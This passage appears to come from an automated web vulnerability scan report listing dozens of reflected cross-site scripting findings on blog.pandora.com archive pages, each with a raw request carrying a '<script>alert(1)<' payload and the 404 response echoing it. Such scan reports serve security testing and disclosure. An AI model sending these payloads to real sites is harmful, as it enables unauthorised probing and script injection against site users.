Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d0986<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesd0986<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:01 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 351 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesd0986<script>alert(1)< ...[SNIP]... |
3.365. http://blog.pandora.com/pandora/archives/minnesota/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5a5b3<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:03 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives ...[SNIP]... |
3.366. http://blog.pandora.com/pandora/archives/mississippi/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f5c1c<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraf5c1c<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:59 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 353 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraf5c1c<script>alert(1)< ...[SNIP]... |
3.367. http://blog.pandora.com/pandora/archives/mississippi/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f4c87<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesf4c87<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:01 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 353 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesf4c87<script>alert(1)< ...[SNIP]... |
3.368. http://blog.pandora.com/pandora/archives/mississippi/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9c40e<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:04 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 353 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives ...[SNIP]... |
3.369. http://blog.pandora.com/pandora/archives/missouri/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e7363<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorae7363<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:03 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorae7363<script>alert(1)< ...[SNIP]... |
3.370. http://blog.pandora.com/pandora/archives/missouri/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 80b38<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives80b38<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:06 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives80b38<script>alert(1)< ...[SNIP]... |
3.371. http://blog.pandora.com/pandora/archives/missouri/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a14db<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:08 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives ...[SNIP]... |
3.372. http://blog.pandora.com/pandora/archives/nebraska/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7cece<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora7cece<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:07 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 350 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora7cece<script>alert(1)< ...[SNIP]... |
3.373. http://blog.pandora.com/pandora/archives/nebraska/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 70673<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives70673<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives70673<script>alert(1)< ...[SNIP]... |
3.374. http://blog.pandora.com/pandora/archives/nebraska/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload de711<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:12 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives ...[SNIP]... |
3.375. http://blog.pandora.com/pandora/archives/new-jersey/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/new |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 338e6<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora338e6<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:07 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 352 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora338e6<script>alert(1)< ...[SNIP]... |
3.376. http://blog.pandora.com/pandora/archives/new-jersey/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/new |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 753ff<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives753ff<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 352 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives753ff<script>alert(1)< ...[SNIP]... |
3.377. http://blog.pandora.com/pandora/archives/new-jersey/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/new |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 97d30<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/new Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:12 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 352 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/new ...[SNIP]... |
3.378. http://blog.pandora.com/pandora/archives/new-york/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/new |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7f622<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora7f622<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:33 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 350 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora7f622<script>alert(1)< ...[SNIP]... |
3.379. http://blog.pandora.com/pandora/archives/new-york/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/new |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 33fe0<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives33fe0<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:36 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives33fe0<script>alert(1)< ...[SNIP]... |
3.380. http://blog.pandora.com/pandora/archives/new-york/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/new |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3aeb2<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/new Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:40 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 350 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/new ...[SNIP]... |
3.381. http://blog.pandora.com/pandora/archives/north-carolina/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/north |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ad877<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraad877<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:13 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 356 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraad877<script>alert(1)< ...[SNIP]... |
3.382. http://blog.pandora.com/pandora/archives/north-carolina/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/north |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5bf6f<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5bf6f<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:15 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 356 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives5bf6f<script>alert(1)< ...[SNIP]... |
3.383. http://blog.pandora.com/pandora/archives/north-carolina/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/north |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 31bd3<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/north Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:17 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 356 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/north ...[SNIP]... |
3.384. http://blog.pandora.com/pandora/archives/north-dakota/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/north |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b2610<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorab2610<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorab2610<script>alert(1)< ...[SNIP]... |
3.385. http://blog.pandora.com/pandora/archives/north-dakota/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/north |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5acb9<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives5acb9<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:29 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives5acb9<script>alert(1)< ...[SNIP]... |
3.386. http://blog.pandora.com/pandora/archives/north-dakota/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/north |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e83f5<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/north Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 354 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/north ...[SNIP]... |
3.387. http://blog.pandora.com/pandora/archives/ohio/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/ohio/ |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f0dd2<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraf0dd2<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:11 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 346 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraf0dd2<script>alert(1)< ...[SNIP]... |
3.388. http://blog.pandora.com/pandora/archives/ohio/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/ohio/ |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 79fc4<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives79fc4<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 346 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives79fc4<script>alert(1)< ...[SNIP]... |
3.389. http://blog.pandora.com/pandora/archives/ohio/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/ohio/ |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 16703<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/ohio16703<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 344 Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/ohio16703<script>alert(1)< ...[SNIP]... |
3.390. http://blog.pandora.com/pandora/archives/oregon/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/oregon/ |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a724b<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraa724b<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraa724b<script>alert(1)< ...[SNIP]... |
3.391. http://blog.pandora.com/pandora/archives/oregon/ [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/oregon/ |
Issue detail
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 39f53<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives39f53<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives39f53<script>alert(1)< ...[SNIP]... |
3.392. http://blog.pandora.com/pandora/archives/oregon/ [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/oregon/ |
Issue detail
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 88507<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/oregon88507<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:18 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 348 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/oregon88507<script>alert(1)< ...[SNIP]... |
3.393. http://blog.pandora.com/pandora/archives/other-states/ [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://blog.pandora.com |
Path: | /pandora/archives/other |
Issue detail
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e4fb4<script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorae4fb4<script>alert(1)< Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728 |
Response
